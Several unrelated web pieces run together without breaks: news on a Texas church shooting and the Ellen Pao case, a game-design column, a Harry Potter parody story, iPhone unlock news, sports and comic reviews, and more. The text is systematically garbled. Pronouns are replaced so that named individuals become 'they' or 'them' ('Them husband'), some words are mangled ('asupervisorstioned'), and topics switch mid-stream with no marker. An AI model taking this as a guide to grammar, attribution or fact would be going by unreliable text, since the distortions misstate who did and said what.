Texas Governor Greg Abbott offered their condolences on Twitter to those impacted by the shooting.
Our prayers are with all who were harmed by this evil act. Our thanks to law enforcement for their response. More details from DPS soon. https://t.co/KMCRmOPkiM — Greg Abbott (@GregAbbott_TX) November 5, 2017
U.S. President Donald Trump tweeted about the shooting from their visit to Japan, stating that they are monitoring the situation.
May God be w/ the people of Sutherland Springs, Texas. The FBI & law enforcement are on the scene. I am monitoring the situation from Japan. — Donald J. Trump (@realDonaldTrump) November 5, 2017
WATCH: Trump offers ‘full support' in Texas church shooting investigation
The town of Sutherland Springs has fewer than 1,000 residents and is located approximately 40 miles east of San Antonio.
READ MORE: First Baptist Church was a fixture in small Texas community of Sutherland Springs
This shooting comes just over a month after 58 people were killed by a gunman at a country music festival in Las Vegas, one of the deadliest mass shootings in U.S. history.
[In Ernest Adams' latest Gamasutra column, they dig into difficulty levels in games, interestingly suggesting that player-set difficulty can, in many cases, be preferable to dynamic difficulty settings.]
I just finished reading a book called Interactive Storytelling, by Andrew Glassner. While the first couple of hundred pages contain useful introductions to both storytelling and game design (for the novice, anyway), the book has some serious flaws and I can't really recommend it. But along the way, Glassner digresses into a variety of other subjects, and one of them is settable difficulty levels. He's against them. They think they ought to be banned.
This really pulled me up short when I read it. My opinion is exactly the opposite: settable difficulty levels should be mandatory in most game genres. In fact, I regard the lack of a difficulty setting as a Twinkie Denial Condition, except for a few kinds of games where they aren't suitable. Since I feel so strongly about this, I was especially interested in Glassner's objections to them. I'll take a look at, and respond to, their points before I go on to talk about their preferred alternative, dynamic difficulty adjustment (also known as adaptive difficulty).
These are Glassner's complaints about settable difficulty levels.
The player has to decide too early. Games usually ask the player to choose a difficulty level right at the beginning, and at that point the player doesn't actually know how hard the game is going to be because they haven't played it yet. My response: This isn't really an argument against difficulty settings. A game could easily give the player an optional training level at medium difficulty, and then allow the player to decide if they want the rest of the game to be easier, harder, or about the same. But even without that, many players can make an educated guess about how well they'll play based on their experience playing similar games (I know I'm lousy at platformers), or they may choose a difficulty setting for other reasons. I always start every game on easy mode, because I'm very busy and I want to see as much of the game as I can in as little time as possible. On the other hand, hardcore players carrying a heavy testosterone load routinely put every game on its hardest setting; that's how you get bragging rights.
The judge has ordered the former venture capitalist to reimburse their adversary in a high-profile Silicon Valley gender discrimination case.
Nearly three months after losing a discrimination case against investment firm Kleiner Perkins, and a back-and-forth on who will foot the trial bill, Ellen Pao will likely have to pay more than $275,000 to cover their adversary's legal expenses.
On Wednesday afternoon, San Francisco Superior Court Judge Harold Kahn issued a tentative ruling that ordered Pao to reimburse the high-profile venture capital firm nearly $275,967 for some of the costs it incurred while successfully defending itself against their lawsuit. Pao, a former venture capitalist at the firm, had accused Kleiner Perkins gender bias and retaliating against them for speaking out.
They ultimately lost the case, but they succeeded in sparking a wide-ranging discussion about gender bias and the lack of women at many Silicon Valley companies.
The Brief Newsletter Sign up to receive the top stories you need to know right now. View Sample Sign Up Now
Kahn wrote that while Pao, who is currently interim CEO for the online forum Reddit, does have significant financial resources, they don't have enough money to cover the full $864,680 Kleiner Perkins had sought. The firm had originally asked for $973,000, including the expert fees, before reducing the amount.
The judge has scheduled a hearing Thursday to finalize the matter.
Following the tentative ruling, Kleiner spokesperson Christina Lee issued the following statement referencing their firm's efforts to settle the lawsuit for $1 million before the trial:
We're pleased the court has reached a fair result. This tentative ruling recognizes that our settlement offer was reasonable and made in good faith. It also recognizes the cost rules still apply when a plaintiff refuses a reasonable settlement offer and forces the parties to go through an expensive trial.
Earlier this month, Pao filed paperwork to appeal the decision in their case. But they have said that they will drop it if Kleiner agrees to pay their $2.7 million.
This article originally appeared on Fortune.com
Contact us at editors@time.com.
A Dream in Black and White
Barry couldn't believe their eyes. Not only was they standing in front of the entrance to the legendary train platform, Nine and Three-Quarters, but the boy who lived, Harry Potter himself, had just rammed through the brick wall with their trolley full of luggage and snowy white owl.
Six months ago, Barry didn't have a clue any of this existed. Most young boys who received their congratulatory letter to Hogwarts, School of Witchcraft and Wizardry, were generally delighted to learn that they had magical abilities. With the American public school system failing, the opportunity to temporarily escape reality was somewhat of a Godsend (especially for those students who weren't set up to follow a Hoop Dreams like scenario). But Barry never received a letter. They had never been told they were a wizard. In fact, they were almost certain that they aren't supposed to be here and had somehow cheated the system.
Six months ago, Barry was playing around with their bedroom's TV antenna. Their mother was behind on the Internet bill again, so they had been trying to intercept their neighbour's signals—he was meant to be writing a report on a world event. All of a sudden, the squiggly lines of static made way for an English sounding announcer:
"... they who shall not be named has returned… son of Amos Diggory murdered… Harry Potter gives no comment on situation…"
To Barry, this didn't make a lot of sense. At least, not at first. It soon became apparent that there was another community out there who was grieving the loss of one of their own. They thought this might make a solid report topic because they had once lost someone close to them too, but they had never had anyone to talk about it with. They sat in front of the television set for hours; after the news bulletins wrapped up, they watched a documentary called Hogwarts: A History which completely changed their lives. Could there really be people out there who solved their problems just by waving a stick? They thought about their brother and wondered if things could have been different if they had grown up in England. Did Hogwarts send acceptance letters to their side of the world? Oh, what it would mean to be chosen!
At school the next day, they shared their findings with their peers: "England is home to a secret group of magical people called wizards."
That was enough for the class to erupt into laughter. Their English teacher, Mr. Samuel L. Jackson, waved their arms to simmer the students down. "Class enough. Barry, if you aren't going to take your assignments seriously, then we're gonna have to be having a separate conversation."
Barry didn't understand. They copied their notes from the TV report verbatim (though they admitted that the signal wasn't so great and there were probably discrepancies). They continued anyways, "At the age of eleven, each child with magical abilities is invited to come study at a wizarding University called Hogwarts…" One of their classmates, Ice Cube, interrupted the presentation.
"What kind of name is Hogwarts anyways? I'm guessing they don't take in vegetarians." Cube smirked at their own joke but the class mostly didn't take notice.
Barry continued. "It's a school that allows you to reach your full potential. It doesn't matter who your family is or what your grades were, they'll take anyone who wants to succeed. And it's a safe place, they don't allow any weapons on the school grounds, all the teachers seem really friendly and best of all, they give all the students these really big meals, as much as you can eat, and for free—it's like you're living in a castle."
The class leaned forward. Ice Cube, who had previously been chewing a pencil, spit out the eraser end and relaxed their hands. "Damn, that actually sounds pretty good." The class nodded their heads in agreement. At the back of the class, a girl with bookworm glasses and a wool sweater wrapped over their shoulders timidly raised their hand. Barry, who for once in their life finally had the attention of their peers, excitedly pointed to them "Yes Rosa?"
Rosa blushed as the entire class turned in their seats to face them "How does one get an acceptance letter exactly?"
"Yeah Barry, how does one get a letter exactly?" Buggin' Out was one of Barry's best friends. With their bright yellow shirt and perpetually jammin' hairdo, they had no doubt that they would be in their bedroom after school, wanting to see the wizard channel for himself.
Mr. Jackson decided that enough was enough. "Look Barry, this was a pretty good story and all but if you want to go to a real college, you're going to need to write me a real report. And furthermore..." Their attention had turned to the cloud of smoke that was slowly forming in the corner of the room. "Jesus Christ. Snoop, what the fuck did I say about lighting up in class?"
"Sorry, nephew."
"I'm not your goddamn nephew!"
Back at home, Barry was once again trying to adjust their television's signal to the wizard network. Only this time, they had an audience. Buggin' Out was occupying themselves with Barry's old Game Boy while their mother, Miss Charlene Little poured out glasses of grape drink for the two boys. Though they didn't have much else other than their son and their one-floor house, and sometimes regretted not being able to offer Barry a wealthier upbringing, they were glad that their son was at least spending their time where they could keep an eye on him.
"Barry, I don't want you messing with that antenna anymore." Miss Little knew what their son was up to, " I told you we're getting Internet back by the end of this week."
Barry groaned, "You said that last week."
Buggin' Out chimed in, "And the week before that one too."
Miss Little handed them a glass, "Buggin' Out, you better watch yourself if you want to keep coming over here."
Suddenly, the static on the TV set turned to sound and a British sporting announcer broke through. Buggin' Out jumped of their chair and landed on their knees in front of the screen, "Oh shit! Here we go!"
"Language, Buggin' Out!" Miss Little couldn't help but watch the screen as it filled up with hoops and wizards on broomsticks. They had received a call from Mr. Jackson earlier letting them know about Barry's presentation. They had never known their son to lie to get out of doing work, so they figured there must have been some sort of misinterpretation. It only took three hours of being glued to the screen before they were a believer.
"Grab the snitch, bitch!"
Buggin' Out had called up virtually everyone they knew and by 9pm, over half of the neighbourhood had gathered into Barry Little's living room. Mr. Jackson, normally known for being much more reserved in such social situations, was laughing excitedly at the screen and shouting at Quidditch players as if they had supported them their entire life. Martin, another one of Barry's classmates was already writing their Hogwarts entrance essay. Ice Cube was flicking a stick they had picked up off the front lawn outside, shouting words that sounded both Latin and proper. Snoop Dogg was completely entranced by what they saw on screen: the broomsticks, the spells, the dwarfs—watching the Quidditch match alone was the best trip they had been on in a long time.
Though it was exciting for their family to be the centre of attention for once, something about all this was upsetting Barry. "Hey guys," they started. "Wouldn't it be great to go to Hogwarts?"
"Hell yeah!" the group agreed in unison.
"No, I mean..." Barry watched the tail end of a broom as it soared through the tallest hoop at the end of the arena. The stadium's audience erupted into cheers as smoke from the tip of the broom spelled out the words, SPONSORED BY QUALITY QUIDDITCH SUPPLIES. "Wouldn't it be great if we could actually go to Hogwarts. I mean for real."
Mr. Jackson, who had previously lit up a pipe without anyone noticing, exhaled and said, "Listen Barry, even if this was all true and not some elaborate prank, I don't want you to get your hopes up. The odds of a school like Hogwarts reaching out to kids on the other side of the world is one in a—"
Buggin' Out held up their hand to silence the room and shift attention to himself. "I have an idea."
Mr. Jackson sighed, "Buggin' Out, I don't think anything good has ever followed one of your ideas."
Buggin' Out ignored him, "Listen up. I'm watching all these wizards on the TV and one thing is clear."
Miss Little had already started to clean up the dishes from around the room (she had an early start the next morning), "And what's that?"
"There ain't any brothas. Not on the wizard news, not on the Quidditch pitch, not in the commercials. It's like an episode of Full House over there."
Cube squinted at the TV. "Hey man, I'm sure I saw at least one negro with a broomstick."
Buggin' Out snorted, "Fine, it's like U.S. Congress then. My point is—that nobody is scooping up any of those sweet, sweet and beautiful minority scholarships."
"What makes you think they even have any minority scholarships in the magical world?"
"Even better. If they don't have any, we could probably guilt them into starting some."
"Buggin' Out, that's the stupidest idea I've ever heard—"
Six months later, Barry stood in front of a brick wall with their friends. Without hesitating, they stepped through the gateway; the edges of their old world began to blur as the excited chatter of children and parents warmed their ears. As the new world came into focus, a cloud of steam puffed out of a smokestack as the Hogwarts Express pulled into the platform. Barry's story was about to begin.
When should jobless benefits end?
How long should the country offer unemployment benefits to the folks caught in the grip of the downturn? How long before those benefits, desperately needed by many, actually become a hurdle to people finding work?
As the nation's job-creating machine sputters toward recovery, it's the question that virtually no lawmaker is addressing publicly:
More than 5,000 people and 50 potential employers were at a job… (RED HUBER, ORLANDO SENTINEL )
For millions of Americans and tens of thousands of Floridians, it is much more than a policy debate. It's a matter of paying the mortgage and keeping the lights on, but the issue has been pushed to the back burner by other priorities.
"No one's really stepped forward on this yet," said Judy Conti, the federal programs coordinator for the National Employment Law Project, a worker-advocacy group. "They just haven't been talking about it."
Why? As a practical matter, federal lawmakers have been preoccupied by another unemployment issue. They are working to ensure that the existing tiers of unemployment benefits are guaranteed through 2010.
Twice this year they've had to pass 30-day emergency extensions because the law authorizing the programs ran out. And twice, those extensions were challenged by Republican legislators worried about the cost.
So supporters of an extended benefits plan are focused on passing a law that reauthorizes the programs for the rest of the year. Until that's in place, so-called "Tier V" benefits will have to wait.
The reauthorization measure, said Tamela Perdue, the general counsel for Associated Industries of Florida, has "kind of used up all the oxygen" surrounding unemployment issues.
That's unsettling for the 8,200 Floridians who exhaust their benefits each week. The jobless here can receive a maximum of 79 weeks of benefits – a figure that will rise to 99 weeks if a bill passed by the Florida Legislature becomes law. In other states, the total is already 99 weeks.
That length of time – a year-and-a-half in Florida – is unprecedented, but so is the number of people who've been out of work for an extended period.
Federal officials say about 45 percent of the unemployed have been jobless for six months or more, and the Pew Economic Policy Group estimates about 23 percent – about 3.4 million people – have been out of work for a year.
Rosina Lopez of Oviedo is among them.
They lost their job as a child-care center inspector in December 2008. Apart from a 12-week temporary assignment, she's not been able to find work since then. Them husband also was laid off and exhausted their benefits at the end of March.
Ever since Comex released JailbreakMe 2.0, the world's first solution to jailbreak iPhone 4, iPhone 4 users have been eagerly waiting for iPhone Dev Team to release Ultrasn0w to unlock iPhone 4.
We have some good news. MuscleNerd and Planetbeing from the iPhone Dev Team announced yesterday that they will be releasing Ultrasn0w to unlock iPhone 4 in 48 hours after they have conducted a private beta.
Update:
iPhone Dev Team Release Ultrasn0w 1.0-1 To Unlock iPhone 4
Planetbeing had announced the good news on Twitter:
We will be releasing to unlock in 48 hours (after we conduct a private beta).
MuscleNerd confirmed it with the following tweet:
iPhone4 carrier unlock will be pushed after small test period (only @planetbeing and I have been able to test til now!)
It looks like one of the private beta testers has leaked the screenshot of Ultrasn0w.
So the release of Ultrasn0w 1.0-1 to unlock iPhone 4 is imminent.
iPhone Dev team had released Ultrasn0w 0.93, their software solution to unlock all basebands since iPhone OS 3.0 including baseband 05.13.04 that comes bundled with iOS 4. As erik has rightly pointed out in the comment, iPhone 4 users should NOT install Ultrasn0w 0.93, its only meant for iPhone 3G and iPhone 3GS users.
Update:
iPhone Dev Team Release Ultrasn0w 1.0-1 To Unlock iPhone 4
We'll let you know as soon as it is released so stay tuned here at iPhone Hacks or follow us on Twitter or subscribe to our RSS feed.
[via Mobile-Geeks]
Like this post? Share it!
As usual, there wasn't a lot of news out of Big Ten Media Days, but one of the tidbits that did turn a few heads was Kirk Ferentz's disclosure that Iowa will be dressing a little differently for one game this year.
Kirk Ferentz says there will be an alternate uniform for one game in 2017. — Chad Leistikow (@ChadLeistikow) July 24, 2017
KF on alternate uniform: We havent really picked a week yet, but theres a little something in the air maybe. — Chad Leistikow (@ChadLeistikow) July 24, 2017
We're going to have to wait for more details, including a look at what the actual alternate uniform might be; if memory serves, they kept the "Blackout" uniform for the Minnesota game in 2015 under wraps until the day of the game itself. I'd guess that game and uniform provide a model for what to expect for Iowa's alternate uniform this season. In other words, don't expect something too out there or crazy, design-wise; it's hard to imagine Ferentz signing off on full-on Oregon-style uniform madness. And there's a good chance that it could be tied to one of Iowa's themed games. This year's Blackout game is against Ohio State (November 4), while the Black and Gold Spirit Game is against Penn State (September 23) and the Gold Out game is against North Texas (September 16). I think we can probably rule out the North Texas game; it's not likely to garner much attention (although it will be televised on ESPN2) and I also don't think it's likely that Iowa will be wearing a primarily gold uniform.
The Blackout game (OSU) and Black and Gold Spirit Game (PSU) are intriguing possibilities, though. Both are against high-profile opponents and stand a decent chance of being played in primetime (especially the Penn State game). The 2015 alternate uniform was used under the lights and it certainly seems logical that they could try to duplicate that effect. (One hitch in that idea is that Iowa won't know until 10 days out whether or not those games will primetime games or not, although it really depends on how far in advance they want to advertise the presence of this alternate uniform.)
Some fans don't care about alternate uniforms and I certainly get that, although when you've worn basically the same thing for 20 years (or 40 if you ignore a few years in the 90s), any change in uniform is certain to raise some eyebrows. And alternate uniforms do garner attention, particularly from recruits. I'm a very big fan of Iowa's standard uniform set, but I don't mind setting aside a game every now and then for something different. Also: the blackout uniforms from 2015 did look pretty sharp.
So: what would you like to see from an Iowa alternate uniform this year? Fire up Photoshop, MS Paint, or your design program of choice and let us know in the comments. Let your fashion flag fly, friends.
George Stephanopoulos at the 24th annual Broadcasting and Cable Hall of Fame Awards in New York in 2014. (Evan Agostini/Invision/AP)
ABC News chief anchor George Stephanopoulos, already under fire for their contributions to Bill and Hillary Rodham Clinton's charitable foundation, served as a moderator and awards judge for an arm of the organization for years without disclosing those roles to viewers.
Stephanopoulos was among a number of well-known TV news figures and columnists who have volunteered to help the Clinton Global Initiative (CGI), an offshoot of the Clinton Foundation that convenes meetings to discuss domestic and international issues.
A former campaign aide and White House adviser to President Bill Clinton, Stephanopoulos has apologized repeatedly since last week for contributing $75,000 to the Clinton Foundation between 2012 and 2014. They have acknowledged that the contributions created an apparent conflict of interest, given that they will be ABC's chief political correspondent during a campaign in which Hillary Clinton is a leading candidate.
But Stephanopoulos has not to date disclosed lending their name to panels organized by CGI, which convenes world leaders for conferences.
Stephanopoulos was a panel moderator in 2006 and a panelist in 2008 and 2009 at CGI's annual conference, according to Peter Schweizer, the author of “Clinton Cash,” a book about the Clintons' finances. They also served as a judge with Chelsea Clinton in 2013 and 2014 on a CGI contest.
The ABC News anchor did not disclose those roles or their financial contributions when they grilled Schweizer about their book last month on their Sunday morning program, “This Week with George Stephanopoulos.”
ABC News spokesperson Heather Riley said Stephanopoulos's involvement with CGI was disclosed to ABC News executives, who considered it “all aboveboard.” They said their activities did not violate any internal policies.
Riley declined to comment on whether they should disclose their past association with CGI to viewers or whether they would be compelled to do so if they have further involvement with the Clinton-affiliated organization.
Riley asked in an e-mail, however, “Did you ask every other journalist that moderated panels for CGI if they disclosed this to their audiences? Only seems fair if you're posing that question to us.”
CGI lists a number of TV anchors, correspondents and commentators as “Notable Past Members,” including Christiane Amanpour and Anderson Cooper of CNN; columnists Thomas Friedman and Nicholas Kristof of the New York Times; Matt Lauer and Tom Brokaw of NBC; Greta Van Susteren of Fox News; Katie Couric (then of CBS); and Judy Woodruff of “PBS Newshour.”
Unlike Stephanopoulos, none of the other media figures were previously employed by one of the Clintons. Woodruff has acknowledged giving $250 to the Clinton Foundation in 2010.
“We've been raising questions about these Clinton conference involvements for years,” said Tim Graham, director of media analysis for the Media Research Center, a conservative watchdog organization based in Reston, Va. While Graham acknowledged that other journalists have participated in Clinton-related events, they said Stephanopoulos's involvement goes deeper, such as judging contests with Chelsea Clinton.
“He should be held to a stricter standard than other Clinton-friendly reporters,” Graham said. “He seems completely oblivious to appearances of a conflict of interest.”
NEW YORK (Reuters) - New York City has agreed to pay a $2 million settlement to protesters arrested during a 2003 rally against the Iraq war who said their civil rights had been violated, lawyers for both sides said on Tuesday.
The 52 plaintiffs in the lawsuit were among 94 protesters arrested on April 7, 2003, during a demonstration at the midtown Manhattan offices of the Carlyle Group, a private equity firm with holdings in the defense sector.
“The New York Police Department violated core constitutional rights when it arrested a group of peaceful demonstrators who were lawfully protesting against the commencement of the Iraq war and those who stood to profit from it,” said Sarah Netburn, a lawyer for the protesters.
In a statement, a lawyer for New York City confirmed the size of the settlement.
“This settlement was reached without any admission of liability on behalf of the city and the individual defendants,” said Susan Halatyn, senior counsel in the Special Federal Litigation Division for New York City.
“Although defendants believe that they would ultimately have prevailed at a trial, the costs of going forward weighed in favor of a settlement at this time.”
Two of the protesters, Eva Hageman and Sarah Kunstler, went to trial on charges of disorderly conduct and were acquitted by a jury, said a lawyer for the New York-based Center for Constitutional Rights, which brought the case.
Charges against the remaining protesters were dismissed without a trial, CCR said.
The settlement, which includes attorney's fees, will be divided evenly among the plaintiffs, lawyers said.
Credit: Kris Anka (Marvel Comics)
Credit: DC Comics
Batman/Teenage Mutant Ninja Turtles #4
Written by James Tynion IV
Art by Freddie Williams II and Jeremy Colwell
Lettering by Tom Napolitano
Published by DC Comics and IDW Publishing
Review by David Pepose
'Rama Rating: 10 out of 10
Is it too late to start giving out 11s for these things?
If you've been holding out on DC and IDW Publishing's Batman/Teenage Mutant Ninja Turtles crossover, now is the time to get on board. After three issues leading up to the Dark Knight and the Heroes in a Half-Shell squaring off, James Tynion IV and Freddie Williams II absolutely crush this interlude issue, which winds up being the most entertaining chapter of this series yet.
Over the past few issues, Tynion has smartly mapped out what commonalities the Turtles and Batman have as characters - their ninjitsu training, their elderly father figures, their varied and robust rogues galleries - and pitted them against one another, causing some particularly fun sparks to fly. But now that the prerequisite superhero misunderstanding is over, Tynion has absolutely one-upped themselves here with some truly precious characterization, as the Turtles crash at the most expensive of digs: the Batcave.
And it's that setting that proves to be this series' best selling point yet, even if the action is actually fairly minimal here. But you can't help but grin seeing how well these two franchises meld together, as we watch Michelangelo be scolded for skateboarding down the bannisters of Wayne Manor by a pizza-schlepping Alfred (or as Mikey adorably calls him, "Old Master Alfred!"), or watching Donatello geek out over Batman's state-of-the-art equipment, or even how Raphael and Batman share a little bit of emo-bro-bat-bonding time in Crime Alley. (And honestly, if a single panel of Batman eating a slice of pepperoni pizza is not the greatest thing you have seen in your entire life, then you need to get yourself checked out, because you have no heart.)
Yes, all of this is absolutely fan-service, but considering that Batman and Alfred have made a career out of training teenage heroes, suddenly a house filled with four of the doesn't seem so out of left field. Because everything in this story is so rooted in character, it's like watching two of your best friends meet and hit it off famously - the fun has just grown exponentially. Even as Tynion is setting up future plot points, everything they add to the mix already is tried-and-true: For example, does adding Casey Jones to the mix make any sense? Not in the slightest - but there is nothing that is not awesome about watching a dude in a hockey mask stepping out of an interdimensional portal wielding a golf club and a hockey stick. Or the final cliffhanger, which promises some big things happening at Arkham Asylum? That's the sort of hook that has me coming back for more.
Meanwhile, the artwork by Freddie Williams II and Jeremy Colwell continues to impress, and only makes me sad that this crossover isn't an ongoing series. Williams should absolutely be on a short-list to keep working on the Turtles after this crossover, as they carefully balance between the dark and muscled street fighters of the original series and the expressive and cartoony scamps of the children's cartoons. The result is this is a book that's going to make young kids feel cooler than cool, and adults are going to have a gritty but accessible take on a nostalgic property. Williams absolutely sells fun expressive bits like Raph scowling as Batman and Leonardo spar, or Donnie grinning widely as they get to watch themselves beat up a bad guy in 360-degree holograms. (And again, the asupervisorstioned panel of Batman eating pizza, I've probably cracked up a half-dozen times as I write this review. Just pure gold.)
When you read as many comic books as I read on a weekly basis, it's easy to name comic bookss that are smart. Or challenging. Or funny. Or just plain convoluted. But honestly, there are very, very few comic books out there that are as positively joyful as this book. You absolutely sense the enthusiasm that this creative team put into this book, and like all unexpected pizza toppings, once you're done, you can't wait until you enjoy it again. If you pick up one book from the Big Two this week, make it this one.
Credit: Marvel Comics
Doctor Strange #6
Written by Jason Aaron
Art by Chris Bachalo, Java Tartaglia, Tim Townsend, Al Vey, Mark Irwin, John Livesay, Wayne Faucher, Victor Olazaba, and Jamie Mendoza
Letters by Cory Petit
Published by Marvel Comics
Review by Justin Partridge
‘Rama Rating: 9 out of 10
“Your inquisition begins now, Sorcerer Supreme.”
From the very start of Jason Aaron's tenure on Doctor Strange, a dark cloud has hung over the mage of Greenwich Village. Now in Doctor Strange #6 that dark cloud has finally burst open and unleashed the “Last Days of Magic.” The enigmatic Empirikul, the technological entity behind the wholesale murder of Sorcerer Supremes, has made landfall on Earth and has put Stephen Strange dead in their sights. Jason Aaron, who has injected a new and grounded energy into the title, continues that streak here as Strange risks it all to stand against the Empirikul as all magic slowly bleeds from the world. Rendered in Chris Bachalo's widescreen panels and given a high level of detail thanks to an army of inkers, Doctor Strange #6 is a beautifully harrowing start to “The Last Days of Magic” and a thrilling jumping-on point for those that have fallen behind on the adventures of Marvel's preeminent practitioner of the mystic arts.
Right from the start, Jason Aaron lets us know that Dr. Strange is on the ropes, and they stay that way throughout this issue. Battered and quickly running out of tricks, Strange makes their stand against the Empirikul on their front doorstep as the magical world around them crumbles. Aaron, a writer who has already conjured a deep and eccentric world for the character, once again makes Strange relatable even as they scrap and scrapes for every bit of attack spells they can. Aaron's Strange isn't the hoity-toity mage that we all have seen in countless team-ups. This new Stephen is fighting for their life and their very existence as the 616's Sorcerer Supreme... and for the first time since this title's debut, I don't think they can win.
While Aaron continues to do great work on a characterization level, this issue also succeeds in fully selling the Empirikul as a threat. Before we only got teasing glimpses of their evil after the dust had settled. However, with this sixth issue, we see exactly how far they are willing to go with their crusade as Aaron gives us quick glances of how their attacks are effecting the world and the rest of Marvel's magical community. They also finally shows us just how powerful their leader is, as they take shot after shot of Strange's the most powerful attacks and it barely phases him, much like Aaron's first major antagonist from The Mighty Thor, the God Butcher, yet another intensely powerful zealot who carried scars from their childhood thanks to otherworldly powers. Before the Empirikul was only a looming threat for Doctor Strange, but as this new story arc kicks off, we now see that they are more than just threats. They are coming to purge the magical world and nothing, not even Dr. Strange, can stand in their way.
Doctor Strange #6 has quite a lot going for it; strong character work, a solid jumping-on point for new readers, as well as functioning as a strong continuation of the narrative introduced in the debut issues. However, the biggest gun in its arsenal continues to be Chris Bachalo, whose frantic, sketchy style continues to be perfect for Strange's world. Once again presented in widescreen panels and given a crazy level of detailing thanks to the whopping seven inkers credited to this issue, this sixth issue is a visual feast from start to finish. Fully capturing the chaos and insanity of a magical battle, Bachalo, along with coloring assistant Java Tartaglia, throws everything at the page and thankfully most of it sticks and sticks beautifully. Each scene is filled to bursting with some kind of insane detailing, like the tree that dominates the page as Strange attempts to entangle their enemies or the dense vertical panels showing how the rest of the magical world is fairing against the attacks. I've said before that you can turn to any page in a Chris Bachalo-drawn comic and find a gorgeous panel, and Doctor Strange #6 is yet another shining example of this.
The world has grown colder in the wake of Doctor Strange #6, and the embers of magic are quickly dying. While Jason Aaron started this new solo title with a comedic edge, it seems that they are turning a corner with its first major story arc. Aaron has brought Strange as low as they can go in the opening issue and even though we know there has to be a triumph at the end, things look very dire right out of the gate. Armed with an art team that refuses to give anything but their best Doctor Strange #6 is exactly the kind of start you want for your first big major story; one that digs its hooks into readers deep and refuses to let them go.
Credit: Aaron Kuder (DC Comics)
Action Comics #50
Written by Greg Pak and Aaron Kuder
Art by Aaron Kuder, David Messina, Javi Fernandez, Bruno Redondo, Vicente Cifuentes, Gaetano Carlucci, Juan Albarran, Tomeu Morey, Arif Prianto and Wil Quintana
Lettering by Steve Wands
Published by DC Comics
Review by David Pepose
'Rama Rating: 5 out of 10
Nine months after their post-Convergence depowering, Clark Kent stands reinvigorated in the pages of the double-sized Action Comics #50. Yet surprisingly, this anniversary issue's expanded page count winds up being more hindrance than help, as Greg Pak, Aaron Kuder and an army of artists has to do some serious reaching to make this thin story stretch to 40 pages.
The problem with Action Comics #50 is that the creators are largely trying to play poker when the audience knows full well they're out of trump cards. Consider this a byproduct of the Superman titles operating in lockstep, but as Superman stages their last stand against Vandal Savage, many readers will recognize they've seen this all before. We've already seen stories about a Kryptonite-powered Superman, so that's not a surprise; we've already seen stories where Vandal Savage executes a large-scale act of destruction, so the tension is diminished; we've even already seen multiple stories where the Man of Steel is saved at the very last second by a cavalcade of DC Comics B-listers, so the luster of all these guest stars is gone. And this is all just in this arc! So with that in mind, Action Comics #50 feels a little bit like sequential art leftovers, because we already know what's about to happen - you can see it on the cover - but Pak and Kuder give no new spins to make this issue feel fresh, and no consequences to pay off any of the plot points from before.
It also doesn't help that the pacing of this story feels sluggish from the get-go, as Pak and Kuder start this issue a big info-dump recapping all of the Superman arcs since the "Truth" storyline began. Unfortunately, this method not only feels artificial, but it winds up seeming a little ridiculous when you mention all these storylines in the same double-page spread - once you see the whole picture this starkly, of course you're going to see all the seams, no matter who's writing this book. But ultimately, Vandal Savage's plan feels super drawn-out, and even though Pak and Kuder throw characters like Batman, Wonder Woman, Steel and Superman's blue imp friend Baku at the problem, it's a lot of throwing things at readers, rather than finding a deliberate hook to draw their interests in. (One example is Clark getting shot in the chest - do we need an extra line about the bullets actually being "an explosion of toxins" when our hero is about to be impaled by spikes anyway?) Unfortunately, for a big status quo-changing issue, the story comes off as very forgettable, very quickly, even as Pak and Kuder try so hard to capture Clark's voice - particularly the joy they feel once they finally regain their long-lost powers.
It doesn't help that this issue has a rotating art team that quickly flies off the rails. While Aaron Kuder lays down a strong foundation for this issue - wonky double-page splashes aside - it's jarring to suddenly be dropped into David Messina's artwork, which has a more cartoony and lushy-inked style similar to the Dodsons. On their own, Messina would have probably done a decent job holding up this book, but the problem with all of the artists on this book is that their styles clash, as the book bounces back to Kuder, Bruno Redondo and Vicente Cifuentes. Even the three colorists on this book have very different styles - from a page-to-page basis, Superman will alternate from being directly in the light to being completely in shadow, to occasionally having a painterly tinge to sometimes being completely washed out in reds and whites. The result is a very disconnected-looking book, which fails to sell Pak and Kuder's script.
What's probably most disappointing about a book like Action Comics #50 is that it almost assuredly was not an easy undertaking - Pak and Kuder are having to juggle storylines with two other books, plus the editors on this issue had to juggle nearly a dozen art and production crew members to put this book out.
Destiny: The Taken King First Impressions – Content Overload
About two weeks ago, I entered the doors to Bungie's studio in Seattle and prepared myself to play Destiny: The Taken King. My guardians were imported to the dev server and ready to go, just as if I were playing the game on my home console on release day (though any progress I made did not carry back over). Last week, I shared my thoughts on The Taken King's additions to Destiny's Crucible mode, and I also gave my impressions of the latest update 2.0 which changed the base game in preparation for Oryx's arrival in our solar system. As such, I will not be talking much further on either of those subjects. Finally, with the arrival of the Dreadnaught, I can speak freely about my time in the presence of The Taken King and the content that they bring.
To be clear before I get much further, this is not a review. You won't see a score at the bottom, and it does not reflect my final thoughts on the latest Destiny expansion. The beginning of Year Two is much bigger than a couple of days at Bungie's studio, and while I spent a good 15 or more hours playing The Taken King, I feel like I barely scratched the surface of the new content, new mechanics, and new loot, not to mention that we didn't even get to glimpse the coming Raid. Our full review is in progress and will be released after I've had enough time with the game once it's in the wild, with the ability to play with my regular fireteam and get a good feel for how the loot drops work over a period of time. If I need to issue any updates before my full review is ready, you can be sure you'll see them here.
Whew! Now that that's out of the way, we can get on to talking about The Taken King. I'm an avid Destiny player, having completed my Moments of Triumph to get the Laurea Prima emblem after hundreds of hours of game time and three characters, I took on every challenge that was thrown at me in Year One. Destiny evolved vastly over time, and Year Two feels like a brand-new game. An epic cinematic introduces Oryx and the opening mission introduces the Taken army in a way that's far more story oriented than Destiny has ever been before. In my original review for Destiny, I commented that it felt like a prologue, laying the foundations with the lore for great moments to come. The Taken King is one of those great moments.
Vanguard Politics
Nathan Fillion. I'm just going to throw that name there on the Vanguard war table. Were you aware that he's the voice of Cayde-6, the Hunter Vanguard? Fillion gets their time to shine in The Taken King, along with the rest of the Vanguard leaders, with a wealth of hilarious dialogue and scenes that fill a huge hole Destiny has had for far too long. Destiny took itself too seriously (that long opening cutscene where the Speaker rambles on, anyone?), with stiff characters and dialogue that became laughable and the end of too many jokes. It finally feels like they are providing a deeper identity and personality behind the people that you interact with. Learning more about the Vanguard politics is fascinating. The banter between Cayde-6 and Eris Morn throughout The Taken King's campaign was easily one of the highlights, though it wasn't even close to the only great thing I experienced.
